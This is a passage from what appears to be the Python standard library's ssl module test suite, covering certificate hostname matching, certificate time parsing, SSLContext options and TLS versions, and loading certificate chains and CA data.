certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# a wildcard in the first fragment combined with IDNA A-labels in
# subsequent fragments is not supported
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2}
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
